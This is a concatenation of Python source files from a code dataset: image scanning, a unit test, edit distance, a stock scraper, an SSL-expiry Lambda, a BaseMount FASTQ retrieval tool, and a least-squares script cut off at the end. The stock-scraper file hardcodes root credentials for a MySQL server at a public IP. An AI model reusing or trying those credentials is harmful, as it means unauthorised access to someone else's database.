cv2.threshold(image,30,255,cv2.THRESH_BINARY)\n kernel = np.ones((5,5),np.uint8)\n\n grey = cv2.GaussianBlur(image,(5,5),0)\n print(\"step 2. Edge Detection\")\n edged = cv2.Canny(grey,75,200)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n print(\"step 3. 
Find contours\")\n cnts = cv2.findContours(edged.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n \n cnts = imutils.grab_contours(cnts)\n cnts = sorted(cnts,key = cv2.contourArea,reverse = True)[:5]\n\n idx = 0\n for c in cnts:\n peri = cv2.arcLength(c,True)\n\n approx = cv2.approxPolyDP(c,0.02 *peri,True)\n x,y,w,h = cv2.boundingRect(c)\n if w > 50 and h > 50:\n idx += 1\n new = image[y:y+h,x:x+w]\n\n\n if len(approx) == 4:\n screenCnt = approx\n break\n if len(approx) != 4:\n print(\"Step 4. Mask\")\n mask(orig);\n exit();\n\n cv2.drawContours(image,[screenCnt],-1,(0,255,0),2)\n\n\n \n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n print('Step 4. Perspective Transform')\n warped,a = four_point_transform(orig,screenCnt.reshape(4,2) *ratio)\n\n if len(approx) ==4 and a<40000:\n mask(orig);\n exit();\n\n warped_new = imutils.resize(warped,height = 500)\n\n cv2.imwrite('newscanned.jpg',warped_new)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n cropped=Image.open('newscanned.jpg')\n enhance_img(cropped);","sub_path":"Final6.py","file_name":"Final6.py","file_ext":"py","file_size_in_byte":5997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"110380300","text":"import unittest\nimport pickle\nimport numpy as np\nimport time\nimport os\n\nfrom PIL import Image\nfrom unittest.mock import Mock\n\nfrom core.preprocessing.wrappers.rgb2gray import RGB2Gray\n\n\nclass TestRGB2Gray(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls) -> None:\n cls.env = Mock()\n cls.wrapper = RGB2Gray(cls.env)\n\n current_directory = os.path.dirname(os.path.abspath(__file__))\n\n with open(os.path.join(current_directory, \"data\", \"_original_images.pkl\"), \"rb\") as file:\n cls.images = pickle.load(file)['rgb']\n\n with open(os.path.join(current_directory, \"data\", \"_original_images_black.pkl\"), \"rb\") as file:\n cls.image_processed = pickle.load(file)\n\n def test_process(self):\n black = self.wrapper.process(self.images)\n image = np.reshape(black, newshape=(64 * 3, 64 * 4))\n self.assertEqual(True, np.array_equal(self.image_processed, image), \"Processed image is not the same as stored\")\n\n def _show_saved_image(self):\n \"\"\" Not a test method, but created for when a user wants to see input/output. \"\"\"\n image = np.reshape(self.images, newshape=(64 * 3, 64 * 4, 3))\n self._show_image(image, wait_time=3)\n\n @staticmethod\n def _show_image(image, wait_time):\n \"\"\" Helper to depict an image for a wait time number of seconds. 
\"\"\"\n img = Image.fromarray(image)\n img.show()\n time.sleep(wait_time)\n img.close()\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/preprocessing/wrappers/test_rgb2gray.py","file_name":"test_rgb2gray.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"579648488","text":"import numpy as np\n\n# A DP program to solve edit distance problem\ndef editDistDP(x, y):\n m = len(x);\n n = len(y);\n # Create an e-table to store results of subproblems\n e = np.zeros((m+1, n+1), dtype=int)\n\n # Fill in e[][] in bottom up manner\n for i in range(m + 1):\n for j in range(n + 1):\n # Initialization\n if i == 0:\n e[i][j] = j\n elif j == 0:\n e[i][j] = i\n elif x[i-1] == y[j-1]:\n e[i][j] = min(1 + e[i-1][j], 1 + e[i][j-1], e[i-1][j-1])\n else:\n e[i][j] = 1 + min(e[i-1][j], e[i][j-1], e[i-1][j-1])\n\n # return e[m][n]\n return e\n\n# Test case 1\n# x = \"snowy\"\n# y = \"sunny\"\n\n# Test case 2\nx = \"heroically\"\ny = \"scholarly\"\n\nprint(editDistDP(x, y))\n","sub_path":"Discussion7/ed_numpy.py","file_name":"ed_numpy.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"196308771","text":"def get_setting():\n res = []\n try:\n with open(\"123.txt\") as f:\n slist = f.readlines()\n print(\"讀入 :\",slist)\n for lst in slist:\n s = lst.split(\",\")\n #Python strip()方法用於移除字符串頭尾指定的字符(默認為空格或換行符)或字符序列。\n res.append([s[0].strip(),float(s[1]),float(s[2])])\n except:\n print(\"讀取錯誤\")\n return res\n\nstock = get_setting()\nprint(stock)","sub_path":"python practice/Line股票實作/6-0.py","file_name":"6-0.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"14282792","text":"# -*- coding: utf-8 -*-\n\"\"\"\n------------------------------------------------- \nFile Name: 6.4self讲解 \nDescription : \nAuthor : ml \ndate: 2018/7/13\n------------------------------------------------- \nChange Activity: \n\t\t\t\t2018/7/13:\n-------------------------------------------------\n\"\"\"\n__author__ = 'ml'\n'''\npython解释器会把这个对象作为第一个参数传递给self,所以开发者只需要传递后面的参数即可\n类中的方法代码块不存放到内存中,减少内存的使用,有个指向类的地址来找方法\n'''\nclass Dog:\n def __init__(self,color):\n self.color = color\n def printColor(self):\n print(\"color:%s\"%self.color)\nwangcai = Dog(\"白\")\nwangcai.printColor()\n\nxiaohei = Dog(\"黑\")\nxiaohei.printColor()","sub_path":"python_basic/6.面向对象1/6.4self讲解.py","file_name":"6.4self讲解.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"39970554","text":"\nfrom onespiderstock import *\nfrom dapan_gegu import *\nfrom spider_holders import *\nfrom yejiyubao import *\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\n\nimport pymysql\n\n\nconn = pymysql.Connect(host='47.105.106.111', port=3306, user='root', password='123456', db='stock',\n charset='utf8')\ncs1 = conn.cursor()\n\ndef del_table(): #清空各表数据\n delete_merge_stock_stock = 'truncate merge_stock'\n delete_one_stock = 'truncate one_spider_stock'\n delete_spiderstock = 'truncate spiderstock'\n delete_gegu_shanghai_stock = 'truncate ge_gu_shanghai'\n delete_gegu_shenzhen_stock = 'truncate ge_gu_shenzhen'\n delete_gegu_chuangyeban_stock = 'truncate ge_gu_chuangyeban'\n delete_gegu_zhongxiaoban_stock = 'truncate ge_gu_zhongxiaoban'\n return 
delete_one_stock,delete_spiderstock,delete_merge_stock_stock,delete_gegu_shanghai_stock,delete_gegu_shenzhen_stock,delete_gegu_chuangyeban_stock,delete_gegu_zhongxiaoban_stock\n\ndef del_text():\n \"\"\"清空数据\"\"\"\n print('清空各表数据')\n delete_t = del_table()\n for i in delete_t:\n cs1.execute(i)\n print('清空完成!开始爬取')\n\n\ndef start_gegu():\n \"\"\"爬取大盘及个股数据\"\"\"\n #单条数据大盘\n one_shanghai()\n one_shenzhen()\n one_zhongxiaoban()\n one_chuangyeban()\n #各股数据\n shanghai_gegu()\n shenzhen_gegu()\n zhongxiaoban_gegu()\n chuangyeban_gegu()\n\ndef over_stock():\n\n print('当天内数据筛选并爬取完毕...')\n print('释放数据库资源...')\n conn.close() #\n\n\nif __name__ == '__main__':\n \"\"\"启动爬虫\"\"\"\n\n # sched = BlockingScheduler()\n # yejiyubao_stock()\n\n spiderholders()\n\n #定时 三点整清空各表数据\n\t#sched.add_job(del_text,trigger='cron',day_of_week='0-4',hour=16, minute=32)\n\n # 定时三点10分爬取各股数据\n\t#sched.add_job(start_gegu,trigger='cron',day_of_week='0-4',hour=16, minute=43)\n # sched.add_job(over_stock, trigger='cron', day_of_week='0-4', hour=15, minute=59)\n \n #业绩预报\n # sched.add_job(yejiyubao_stock, trigger='cron', day_of_week='0-4', hour=10, minute=39)\n #股东人数\n # sched.add_job(spiderholders,trigger='cron',day_of_week='0-4',hour=19, minute=30)\n #释放数据库\n # sched.add_job(over_stock,trigger='cron',day_of_week='0-4',hour=21, minute=00)\n\n # sched.start()\n\n\n\n","sub_path":"股票爬取/spider_main.py","file_name":"spider_main.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"102062147","text":"\nimport socket\nimport ssl\nimport json\nimport re,sys,os,datetime\nfrom botocore.vendored import requests\n\ndef ssl_expiry_date(domainname):\n ssl_date_fmt = r'%b %d %H:%M:%S %Y %Z'\n context = ssl.create_default_context()\n conn = context.wrap_socket(\n socket.socket(socket.AF_INET),\n server_hostname=domainname,\n )\n # 3 second timeout because Lambda has runtime limitations\n conn.settimeout(3.0)\n conn.connect((domainname, 443))\n ssl_info = conn.getpeercert()\n return datetime.datetime.strptime(ssl_info['notAfter'], ssl_date_fmt).date()\n\ndef slack(alert, expires, days):\n data = {\n \"username\": \"Cert Bot\",\n \"icon_emoji\": \":shield:\",\n \"text\": os.environ['CHECK_URL'] + \" SSL Certificate Due To Expire\",\n \"attachments\": [\n {\n \"color\": \"#c0392b\" if alert else '#d35400',\n \"fields\": [\n {\n \"title\": \"Expiry Date\",\n \"value\": expires.strftime('%A %B %-d %Y at %H:%M:%S'),\n \"short\": \"true\"\n },\n {\n \"title\": \"Days Remaining\",\n \"value\": days,\n \"short\": \"true\"\n }\n ]\n }\n ]\n }\n\n post_data = json.dumps(data).encode('utf-8')\n\n req = requests.post(os.environ['SLACK_URL'], post_data)\n\n print(req.status_code, req.reason)\n\n#####Main Section\ndef handler(event, context):\n expires = ssl_expiry_date(os.environ['CHECK_URL'])\n remains = int((expires - datetime.datetime.utcnow().date()).days)\n\n print('Expires: ', expires)\n print('Remains: ', remains)\n\n if remains <= int(os.environ['ALERT_DAYS']):\n slack(True, expires, remains)\n elif remains <= int(os.environ['WARN_DAYS']):\n slack(False, expires, remains)","sub_path":"lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"22531994","text":"#!/usr/bin/env python3\n\"\"\"\nDEV NOTE:\nThis is becoming difficult to maintain and could use a complete rewrite. 
The 'miseqsim' flag was added as an\nafterthought, though has now become the main focus of this script. Ultimately, navigating around BaseMount is going to\nbe messy, but this could still be much cleaner.\n\nIt might also be worth transitioning to the V2 API (basemount --use-v2-api).\n\"\"\"\n\nimport os\nimport click\nimport shutil\nimport logging\nimport pandas as pd\nfrom pathlib import Path\nfrom BaseMountRetrieve.__init__ import __version__, __author__, __email__\n\nscript = os.path.basename(__file__)\nlogger = logging.getLogger()\nlogging.basicConfig(\n format=f'\\033[92m \\033[1m {script}:\\033[0m %(message)s ',\n level=logging.INFO)\n\n\ndef print_version(ctx, param, value):\n if not value or ctx.resilient_parsing:\n return\n logging.info(f\"Version: {__version__}\")\n logging.info(f\"Author: {__author__}\")\n logging.info(f\"Email: {__email__}\")\n quit()\n\n\ndef convert_to_path(ctx, param, value):\n if not value or ctx.resilient_parsing:\n return\n return Path(value)\n\n\n@click.command()\n@click.option('-p', '--projectdir',\n type=click.Path(exists=True),\n required=False,\n default=None,\n help='Path to the directory on BaseMount for a particular project. e.g. '\n 'basemount/Projects/[your project].',\n callback=convert_to_path)\n@click.option('-o', '--outdir',\n type=click.Path(exists=False),\n required=True,\n default=None,\n help='Directory to dump all .fastq.gz files. Note that the Sample ID will be appended to the beginning '\n 'of the copied .fastq.gz file, which normally only contains the Sample Name.',\n callback=convert_to_path)\n@click.option('-m', '--miseqsim',\n help='Specify this flag to simulate the MiSeq folder structure when retrieving from BaseSpace',\n is_flag=True,\n default=False)\n@click.option('-v', '--verbose',\n help='Specify this flag to enable more verbose output.',\n is_flag=True,\n default=False)\n@click.option('--version',\n help='Specify this flag to print the version and exit.',\n is_flag=True,\n is_eager=True,\n callback=print_version,\n expose_value=False)\ndef cli(projectdir, outdir, miseqsim, verbose):\n logging.info(f\"Started BaseMountRetrieve (v{__version__})\")\n\n if verbose:\n logging.getLogger().setLevel(logging.DEBUG)\n logging.debug(\"Enabled VERBOSE mode\")\n\n # Create output directory if it doesn't already exist\n os.makedirs(outdir, exist_ok=True)\n\n # Get samplesheets\n samplesheet_dict = {}\n run_translation_dict = {}\n if miseqsim:\n samplesheet_dict, run_translation_dict = retrieve_run_files(projectdir=projectdir, outdir=outdir)\n\n # Get list of samples to transfer, download files\n retrieve_samples(projectdir=projectdir, outdir=outdir, miseqsim=miseqsim)\n\n # Move everything around to simulate MiSeq folder structure\n if miseqsim:\n logfile_dict = retrieve_logfile_dict(projectdir)\n sample_dict = get_sample_dictionary(outdir)\n\n logging.debug(\"SAMPLE DICTIONARY:\")\n for sample_id, reads in sample_dict.items():\n logging.debug(f\"{sample_id}:\\t{reads}\")\n\n base_folders = ['Config',\n 'Data',\n 'Images',\n 'InterOp',\n 'Logs',\n 'Recipes',\n 'Thumbnail_Images']\n for run_id, file_list in samplesheet_dict.items():\n os.makedirs(outdir / run_id, exist_ok=True)\n shutil.copy(file_list[0], outdir / run_id / 'SampleSheet.csv')\n\n runinfo_out = outdir / run_id / 'RunInfo.xml'\n if not runinfo_out.exists():\n shutil.copy(file_list[1], runinfo_out)\n else:\n logging.debug(f\"Skipping {runinfo_out} (already exists)\")\n\n runparams_out = outdir / run_id / 'RunParameters.xml'\n if not runparams_out.exists():\n try:\n 
shutil.copy(file_list[2], runparams_out)\n except FileNotFoundError:\n logging.warning(\"WARNING: Could not find RunParameters.xml. Skipping.\")\n else:\n logging.debug(f\"Skipping {runparams_out} (already exists)\")\n\n # Make folder structure\n for f in base_folders:\n os.makedirs(outdir / run_id / f, exist_ok=True)\n\n read_folder = outdir / run_id / 'Data' / 'Intensities' / 'BaseCalls'\n os.makedirs(read_folder, exist_ok=True)\n\n df = read_samplesheet(file_list[0])\n sample_id_list = get_sample_id_list(df)\n for sample_id, reads in sample_dict.items():\n if sample_id in sample_id_list:\n shutil.move(reads[0], read_folder / reads[0].name)\n shutil.move(reads[1], read_folder / reads[1].name)\n\n # Copy all the log files over to the 'Logs' folder\n for verbose_run_name, log_list in logfile_dict.items():\n if run_translation_dict[verbose_run_name] == run_id:\n for logfile in logfile_dict[verbose_run_name]:\n outname = outdir / run_id / 'Logs' / logfile.name\n shutil.copy(src=logfile, dst=outname)\n os.chmod(str(outname), 0o775) # Fix permissions\n\n interop_folder_contents = retrieve_interop_contents(run_id=run_id, projectdir=projectdir)\n copy_interop_folder_contents(run_id=run_id, interop_folder_contents=interop_folder_contents, outdir=outdir)\n\n # Delete remnant .csv + .xml files\n if miseqsim:\n cleanup_csv = list(outdir.glob(\"*.csv\"))\n cleanup_xml = list(outdir.glob(\"*.xml\"))\n cleanup_list = cleanup_csv + cleanup_xml\n for f in cleanup_list:\n os.chmod(str(f), 0o775)\n os.remove(f)\n logging.info(f\"Process complete. Results available in {outdir}\")\n\n\ndef retrieve_samples(projectdir: Path, outdir: Path, miseqsim: bool):\n # Gather all BaseMount file paths\n fastq_list = list(projectdir.glob(\"Samples/*/Files/*\"))\n\n # Filter out hidden stuff, coerce to Path\n fastq_list = [Path(x) for x in fastq_list if \".id.\" not in str(x)]\n\n # Filter out duplicated samples. Primitive way of checking for \" (2)\" or \" (3)\". 
Definitely a better way to do this.\n fastq_list = [x for x in fastq_list if ' (' not in x.parents[1].name]\n\n # Try to search in another location for *.fastq.gz if files couldn't be located\n if len(fastq_list) == 0:\n fastq_list = list(projectdir.glob(\"AppSessions.v1/*/Sample*/Files/*\"))\n fastq_list = [Path(x) for x in fastq_list if \".id.\" not in str(x)]\n fastq_list = [x for x in fastq_list if ' (' not in x.parents[1].name]\n\n logging.info(f\"Detected {len(fastq_list)} FASTQ files\")\n\n # This list stores all files to be copied from Basemount to the outdir\n transfer_list = []\n\n # Check to see if files already exist in the outdir\n if not miseqsim:\n outdir_files = list(outdir.glob('*.fastq.gz'))\n else:\n outdir_files = list(outdir.glob('*/Data/Intensities/BaseCalls/*.fastq.gz'))\n\n # If the outdir is empty, we want to transfer all detected valid .fastq files\n if len(outdir_files) == 0:\n transfer_list = fastq_list\n\n for i in fastq_list:\n # Get name components of sample\n sampleid = i.parents[1].name\n samplename = i.name\n\n # Prepare outfile names, append BMH sample_id if it's not already in the filename\n if sampleid not in samplename:\n outname = outdir / Path(sampleid + \"_\" + samplename)\n else:\n outname = outdir / Path(samplename)\n\n # Skip files that already exist\n for j in outdir_files:\n if outname.name not in str(j):\n transfer_list.append(i)\n else:\n logging.debug(f\"Skipping {i.name} (already exists)\")\n\n # Begin copying files\n for i in sorted(set(transfer_list)):\n # Get name components of sample\n sampleid = i.parents[1].name\n samplename = i.name\n\n # Copy to outdir\n if sampleid not in samplename:\n outname = outdir / Path(sampleid + \"_\" + samplename)\n else:\n outname = outdir / Path(samplename)\n\n if miseqsim:\n outdir_file_names = [x.name for x in outdir_files]\n tmp_name = sampleid + '_' + i.name\n if tmp_name not in outdir_file_names:\n logging.info(f\"Copying {samplename}...\")\n try:\n shutil.copy(i, outname)\n os.chmod(str(outname), 0o775)\n except IsADirectoryError:\n logging.warning(f\"WARNING: Could not copy {i} because it's a directory\")\n else:\n if outname.exists():\n logging.debug(f\"Skipping {outname.name} (already exists)\")\n else:\n logging.info(f\"Copying {samplename}...\")\n shutil.copy(i, outname) # shutil.copy is filesystem agnostic, unlike shutil.move, os.rename\n os.chmod(str(outname), 0o775) # Fix permissions\n\n\ndef retrieve_logfile_dict(projectdir: Path) -> dict:\n run_folders = get_run_folders(projectdir)\n log_dict = dict()\n for verbose_run_name in run_folders:\n logfiles = list(verbose_run_name.glob('Logs/*'))\n logfiles = [Path(x) for x in logfiles if not Path(x).name.startswith(\".\")]\n log_dict[verbose_run_name.name] = logfiles\n return log_dict\n\n\ndef retrieve_run_files(projectdir: Path, outdir: Path) -> tuple:\n \"\"\"\n Returns two dictionaries due to a poor design decision. TODO: Make this whole thing less sloppy\n :param projectdir:\n :param outdir:\n :return:\n \"\"\"\n # Locate samplesheets\n samplesheets = list(projectdir.glob('AppSessions.v1/*/Properties/Input.sample-sheet'))\n samplesheets = [Path(x) for x in samplesheets if \".id.\" not in str(x)]\n\n logging.debug(f\"Found {len(samplesheets)} samplesheets\")\n if len(samplesheets) == 0:\n logging.error('ERROR: Could not find samplesheets for project. 
Quitting.')\n quit()\n\n # Copy samplesheets into outdir\n samplesheet_dict = dict()\n run_translation_dict = dict()\n for samplesheet in samplesheets:\n verbose_run_name = samplesheet.parents[1].name\n samplesheet_outname = outdir / (verbose_run_name + '.' + 'SampleSheet.csv')\n runxml_outname = outdir / (verbose_run_name + '.' + 'RunInfo.xml')\n runparametersxml_outname = outdir / (verbose_run_name + '.' + 'RunParameters.xml')\n runinfoxml = samplesheet.parent / 'Input.Runs' / '0' / 'Files' / 'RunInfo.xml'\n runparametersxml = samplesheet.parent / 'Input.Runs' / '0' / 'Files' / 'RunParameters.xml'\n\n logging.info(f'Copying SampleSheet.csv for {samplesheet.parents[1].name} to {samplesheet_outname}')\n shutil.copy(str(samplesheet), str(samplesheet_outname))\n os.chmod(str(samplesheet_outname), 0o775)\n\n breakout = False\n if not runxml_outname.exists():\n logging.info(f'Copying RunInfo.xml for {runinfoxml} to {runxml_outname}...')\n try:\n shutil.copy(str(runinfoxml), str(runxml_outname))\n os.chmod(str(runxml_outname), 0o775)\n except FileNotFoundError as e:\n logging.warning(\"WARNING: Couldn't find RunInfo.xml in the expected location. Trying again...\")\n logging.error(f\"TRACEBACK: {e}\")\n try:\n runinfoxml = samplesheet.parents[1] / 'Logs' / 'RunInfo.xml'\n shutil.copy(str(runinfoxml), str(runxml_outname))\n os.chmod(str(runxml_outname), 0o775)\n except FileNotFoundError:\n logging.warning(f\"WARNING: {verbose_run_name} is missing critical files and will be skipped\")\n breakout = True\n else:\n logging.debug(f\"Skipping {runxml_outname} (already exists)\")\n\n if breakout:\n break\n\n if not runparametersxml_outname.exists():\n try:\n logging.info(f'Copying RunParameters.xml for {runparametersxml} to {runparametersxml_outname}...')\n shutil.copy(str(runparametersxml), str(runparametersxml_outname))\n os.chmod(str(runparametersxml_outname), 0o775)\n except FileNotFoundError:\n # TODO: Figure out if this file can be retrieved from somewhere else\n logging.warning(f\"WARNING: Could not find RunParameters.xml for {verbose_run_name}. 
Skipping.\")\n else:\n logging.debug(f\"Skipping {runparametersxml_outname} (already exists)\")\n\n run_id = extract_run_name(samplesheet=samplesheet)\n run_translation_dict[verbose_run_name] = run_id\n samplesheet_dict[run_id] = [samplesheet_outname, runxml_outname, runparametersxml_outname]\n\n return samplesheet_dict, run_translation_dict\n\n\ndef get_run_folders(projectdir: Path) -> list:\n runfolders = list(projectdir.glob('AppSessions.v1/*'))\n runfolders = [Path(x) for x in runfolders if not Path(x).name.startswith(\".\")]\n return runfolders\n\n\ndef read_samplesheet(samplesheet: Path) -> pd.DataFrame:\n \"\"\"\n Reads SampleSheet.csv and returns dataframe (all header information will be stripped)\n :param samplesheet: Path to SampleSheet.csv\n :return: pandas df of SampleSheet.csv with head section stripped away\n \"\"\"\n counter = 1\n with open(str(samplesheet)) as f:\n for line in f:\n if '[Data]' in line:\n break\n else:\n counter += 1\n df = pd.read_csv(samplesheet, sep=\",\", index_col=False, skiprows=counter)\n return df\n\n\ndef validate_samplesheet_header(header: list) -> bool:\n \"\"\"\n Validates that column names match expected values\n :param header: List of column names\n :return: True if header meets all expected values, False if not\n \"\"\"\n expected_header = [\n 'Sample_ID',\n 'Sample_Name',\n 'Sample_Plate',\n 'Sample_Well',\n 'I7_Index_ID',\n 'index',\n 'I5_Index_ID',\n 'index2',\n 'Sample_Project',\n 'Description'\n ]\n if not set(header) == set(expected_header):\n raise Exception(f\"Provided header {header} does not match expected header {expected_header}\")\n else:\n return True\n\n\ndef get_sample_id_list(samplesheet_df: pd.DataFrame) -> list:\n \"\"\"\n Returns list of all SampleIDs in SampleSheet dataframe\n :param samplesheet_df: df returned from read_samplesheet()\n :return: list of all Sample IDs\n \"\"\"\n sample_id_list = list(samplesheet_df['Sample_ID'])\n return sample_id_list\n\n\ndef group_by_project(samplesheet_df: pd.DataFrame) -> dict:\n \"\"\"\n Groups samples by project extracted from SampleSheet.csv.\n :param samplesheet_df: df returned from read_samplesheet()\n :return: project dictionary (Keys are project names, values are lists of associated samples)\n \"\"\"\n project_list = list(samplesheet_df.groupby(['Sample_Project']).groups.keys())\n project_dict = {}\n for project in project_list:\n project_dict[project] = list(samplesheet_df[samplesheet_df['Sample_Project'] == project]['Sample_ID'])\n return project_dict\n\n\ndef retrieve_interop_contents(run_id: str, projectdir: Path):\n try:\n interop_folder = projectdir.parents[1] / 'Runs' / run_id / 'Files' / 'InterOp'\n except Exception as e:\n logging.error(\"ERROR: Couldn't retrieve InterOp contents.\")\n logging.error(f\"TRACEBACK: {e}\")\n return\n\n interop_folder_contents = list(interop_folder.glob(\"*\"))\n return interop_folder_contents\n\n\ndef copy_interop_folder_contents(run_id: str, interop_folder_contents: list, outdir: Path):\n logging.info(f\"Copying InterOp folder contents for {run_id}...\")\n for f in interop_folder_contents:\n outname = outdir / run_id / 'InterOp' / f.name\n if outname.exists():\n logging.debug(f\"Skipping {outname.name} for {run_id} (already exists)\")\n elif not f.is_dir() and f.is_file():\n logging.info(f\"Copying {f}...\")\n shutil.copy(src=f, dst=outname)\n try:\n os.chmod(str(outname), 0o775)\n except PermissionError as e:\n logging.error(f\"ERROR: Could not change permissions for {outname}\")\n logging.error(f\"TRACEBACK: {e}\")\n else:\n 
logging.debug(f\"Skipping {f}\")\n\n\ndef extract_run_name(samplesheet: Path) -> str:\n \"\"\"\n Retrieves the 'Experiment Name' from SampleSheet.csv\n :param samplesheet: Path to SampleSheet.csv\n :return: value of 'Experiment Name'\n \"\"\"\n with open(str(samplesheet)) as f:\n for line in f:\n if 'Experiment Name' in line:\n experiment_name = line.split(',')[1].strip()\n logging.debug(f\"Detected the following experiment name: {experiment_name}\")\n return experiment_name\n else:\n raise Exception(f\"Could not find 'Experiment Name' in {samplesheet}\")\n\n\ndef retrieve_fastqgz(directory: Path) -> [Path]:\n \"\"\"\n :param directory: Path to folder containing output from MiSeq run\n :return: LIST of all .fastq.gz files in directory\n \"\"\"\n fastq_file_list = list(directory.glob(\"*.f*q*\"))\n return fastq_file_list\n\n\ndef retrieve_sampleids(fastq_file_list: [Path]) -> list:\n \"\"\"\n :param fastq_file_list: List of fastq.gz filepaths generated by retrieve_fastqgz()\n :return: List of Sample IDs\n \"\"\"\n # Iterate through all of the fastq files and grab the sampleID, append to list\n sample_id_list = list()\n for f in fastq_file_list:\n sample_id = f.name.split('_')[0]\n sample_id_list.append(sample_id)\n\n # Get unique sample IDs\n sample_id_list = list(set(sample_id_list))\n return sample_id_list\n\n\ndef get_readpair(sample_id: str, fastq_file_list: [Path], forward_id: str = \"_R1\", reverse_id: str = \"_R2\") -> (list,\n None):\n \"\"\"\n :param sample_id: String of sample ID\n :param fastq_file_list: List of fastq.gz file paths generated by retrieve_fastqgz()\n :param forward_id: ID indicating forward read in filename (e.g. _R1)\n :param reverse_id: ID indicating reverse read in filename (e.g. _R2)\n :return: the absolute filepaths of R1 and R2 for a given sample ID\n \"\"\"\n\n r1, r2 = None, None\n for f in fastq_file_list:\n if sample_id in f.name:\n if forward_id in f.name:\n r1 = f\n elif reverse_id in f.name:\n r2 = f\n if r1 is not None and r2 is not None:\n return [r1, r2]\n else:\n logging.warning('WARNING: Could not pair {}'.format(sample_id))\n return None\n\n\ndef populate_sample_dictionary(sample_id_list: list, fastq_file_list: [Path]) -> dict:\n \"\"\"\n :param sample_id_list: List of unique Sample IDs generated by retrieve_sampleids()\n :param fastq_file_list: List of fastq.gz file paths generated by retrieve_fastqgz()\n :return: dictionary with each Sample ID as a key and the read pairs as values\n \"\"\"\n # Find file pairs for each unique sample ID\n sample_dictionary = {}\n for sample_id in sample_id_list:\n read_pair = get_readpair(sample_id, fastq_file_list)\n if read_pair is not None:\n sample_dictionary[sample_id] = read_pair\n else:\n pass\n return sample_dictionary\n\n\ndef get_sample_dictionary(directory: Path) -> dict:\n \"\"\"\n Creates a sample dictionary with unique/valid sample IDs as keys and paths to forward and reverse reads as values\n :param directory: Path to a directory containing .fastq.gz files\n :return: Validated sample dictionary with sample_ID:R1,R2 structure\n \"\"\"\n fastq_file_list = retrieve_fastqgz(directory)\n sample_id_list = retrieve_sampleids(fastq_file_list)\n sample_dictionary = populate_sample_dictionary(sample_id_list, fastq_file_list)\n if len(sample_dictionary) > 0:\n logging.info(f\"Successfully paired {len(sample_dictionary)} of {len(sample_id_list)} samples\")\n return sample_dictionary\n\n\nif __name__ == \"__main__\":\n 
cli()\n","sub_path":"BaseMountRetrieve/basemountretrieve.py","file_name":"basemountretrieve.py","file_ext":"py","file_size_in_byte":20557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"611464695","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n最小二乘法直接计算方式\r\n在实践中, β0。和β1 都是未知的。所以在用式(3. 1) 做出预测之前,我们必须根据数据集\r\n估计系数。令\r\n(x1, y1),(x2, y2),(x3, y3),...,(xn, yn)\r\n\r\n\"\"\"\r\nfrom numpy import *\r\nimport numpy as np \r\nimport operator\r\nimport matplotlib.pyplot as plt \r\n\r\ndef loadDataSet(fileName): \r\n X = []; Y = []\r\n fr = open(fileName)\r\n for line in fr.readlines():\r\n curLine = line.strip().split('\\t')\r\n X.append(float(curLine[0])); Y.append(float(curLine[-1]))\r\n return X,Y\r\n\r\n#绘制散点\r\ndef plotscatter(Xmat,Ymat,plt):\r\n\t# fig=plt.subplot()\r\n\t# fig = plt.figure()\r\n\tax = plt.subplot(2,1,1)\r\n\t# ax = fig.add_subplot(111) # 绘制图形位置\r\n\tplt.plot(Xmat,Ymat, 'go' ,markersize=2)\t# 绘制散点图\r\n\r\n\r\ndef plotLine(Xmat,yhat,plt):\r\n\tplt.plot(Xmat,yhat,'r') # 绘制回归线\r\n\r\n#根据回归的系数计算预测值\r\ndef cal(Xmat,Ymat,a,b):\r\n\tx=Xmat\r\n\t# x.sort() # 对Xmat各元素进行排序\r\n\tyhat = [a*float(xi)+b for xi in x] # 计算预测值\r\n\treturn yhat\r\n\r\n#拟合\r\ndef leastSquare(Xmat, Ymat):\r\n\tmeanX = mean(Xmat) # 原始数据集的均值\r\n\tmeanY = mean(Ymat)\r\n\r\n\tdX = Xmat-meanX # 各元素与均值的差\r\n\tdY = Ymat-meanY\r\n\r\n\tsumXY = vdot(dX,dY) # 返回两个向量的点乘 multiply\r\n\tSqX = sum(power(dX,2)) # 向量的平方:(X-meanX)^2\r\n\r\n\t# 计算斜率和截距\r\n\ta = sumXY/SqX\r\n\tb = meanY - a*meanX\r\n\treturn a,b\r\n\r\n\r\n\r\n#yArr and yHatArr both need to be arrays\r\ndef rssError(yArr,yHatArr):\r\n\treturn ((yArr-yHatArr)**2).sum()\r\n\r\n#拟合一个变量\r\ndef leastSquareDedail(Xmat, Ymat):\r\n\tmeanX = mean(Xmat) # 原始数据集的均值\r\n\tmeanY = mean(Ymat)\r\n\r\n\tdX = Xmat-meanX # 各元素与均值的差\r\n\tdY = Ymat-meanY\r\n\t# m,n=shape(Xmat)\r\n\tws =[]\r\n\t# 手工计算:\r\n\tsumXY = 0; SqX = 0\r\n\tfor i in xrange(len(dX)):\r\n\t\tsumXY += double(dX[i])*double(dY[i])\r\n\t\tSqX += double(dX[i])**2\r\n\t\tws.append(SqX)\r\n\r\n\t# 计算斜率和截距\r\n\ta = sumXY/SqX\r\n\tb = meanY - 